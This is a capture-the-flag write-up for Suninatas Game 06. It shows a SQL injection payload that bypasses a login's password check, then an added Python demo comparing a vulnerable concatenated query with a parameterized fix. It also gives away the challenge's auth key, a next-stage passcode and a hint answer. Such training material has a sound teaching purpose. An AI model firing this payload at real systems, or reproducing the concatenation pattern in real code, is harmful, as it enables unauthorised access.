Suninatas Game 06

Game 06

Vulnerability: SQL Injection

Attack Vector

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Injecting 1' or '1' like '1 as the password produces:

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

This bypasses the password check: the injected quote closes the szPwd literal, and because AND binds tighter than OR, the WHERE clause becomes (nIdx = '3' and szPwd = '1') or ('1' like '1'), which is always true regardless of the real password.
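The vulnerable concatenation beside its parameterized fix, as an added example that is not part of the original writeup. It uses an in-memory SQLite stand-in for T_Web13 with a constructed placeholder password; the column names are the ones in the page's query, the stored value is an assumption.

```python
import sqlite3

PAYLOAD = "1' or '1' like '1"        # the injection string from the writeup
REAL_PWD = "placeholder-password"    # constructed sample value, not the real one


def build_db():
    """Constructed stand-in for the challenge's T_Web13 table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE T_Web13 (nIdx TEXT, szPwd TEXT)")
    conn.execute("INSERT INTO T_Web13 VALUES ('3', ?)", (REAL_PWD,))
    return conn


def vulnerable_check(conn, pwd):
    """Mirrors the classic-ASP '"&pwd&"' concatenation: user input becomes
    part of the SQL text, so a quote in it changes the query structure."""
    sql = ("select szPwd from T_Web13 where nIdx = '3' and szPwd = '"
           + pwd + "'")
    return conn.execute(sql).fetchone() is not None


def safe_check(conn, pwd):
    """Parameterized form: the value is bound separately, so quotes, OR and
    LIKE inside it are compared as data, never parsed as SQL."""
    sql = "select szPwd from T_Web13 where nIdx = '3' and szPwd = ?"
    return conn.execute(sql, (pwd,)).fetchone() is not None


def demo():
    """Returns (vulnerable result, safe result) for the injection payload."""
    conn = build_db()
    return vulnerable_check(conn, PAYLOAD), safe_check(conn, PAYLOAD)


if __name__ == "__main__":
    print(demo())  # (True, False): only the concatenated query is bypassed
```

The safe variant still accepts the real password, so the fix removes the bypass without changing legitimate behaviour.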

Success Response

Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus